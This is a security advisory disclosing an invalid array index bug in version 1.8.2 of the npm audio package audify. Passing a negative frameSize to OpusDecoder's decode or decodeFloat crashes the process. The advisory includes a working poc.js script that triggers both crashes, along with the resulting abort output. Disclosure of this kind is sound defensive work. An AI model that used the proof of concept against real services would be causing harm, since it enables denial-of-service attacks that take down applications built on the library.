Invalid Array Index in audify@v1.8.2

01_Invalid_Array_Index_audify@v1.8.2.md

Information

Package: audify

Tested Version: 1.8.2

GitHub Repository: https://github.com/almoghamdani/audify

Vulnerability: Invalid Array Index

Details

Providing a negative frameSize to the new OpusDecoder().decode or new OpusDecoder().decodeFloat makes it possible to set a negative value for an array length, leading to the process crash. The frameSize is not checked for negative values.

Vulnerable code:

• https://github.com/almoghamdani/audify/blob/94b2fe79dc528fda2c7d59c7a0fd0e9de07dc3dc/src/opus_decoder.cpp#L53
• https://github.com/almoghamdani/audify/blob/94b2fe79dc528fda2c7d59c7a0fd0e9de07dc3dc/src/opus_decoder.cpp#L79

Setup

Tested on:

Ubuntu 22.04.3 LTS
Node v18.19.0

Installation:

npm install audify

PoC

Usage:

node poc.js <poc1|poc2>

• poc1

node poc.js poc1
Running poc1
terminate called after throwing an instance of 'std::bad_array_new_length'
  what():  std::bad_array_new_length
Aborted (core dumped)

• poc2

node poc.js poc2
Running poc2
terminate called after throwing an instance of 'std::bad_array_new_length'
  what():  std::bad_array_new_length
Aborted (core dumped)

Impact

Denial of Service (DoS)

Author

Alessio Della Libera

poc.js

const { OpusEncoder, OpusDecoder, OpusApplication } = require("audify");

const decoder = new OpusDecoder(48000, 2);

const frameSize = -1; 
const buffer = Buffer.from("A");

function poc1(){
    console.log('Running poc1');
    decoder.decode(buffer, frameSize);
}
    

function poc2(){
    console.log('Running poc2');
    decoder.decodeFloat(buffer, frameSize);
}


const pocs = new Map();
pocs.set('poc1', poc1);
pocs.set('poc2', poc2);


function run() {
    const args = process.argv.slice(2);
    const p = args[0];
    const poc = pocs.get(p) || poc1;

    try {
        poc();
    } catch (e) {
        console.log('Never executed')
        console.log(e);
    }
    
    console.log('Never executed')
}

run();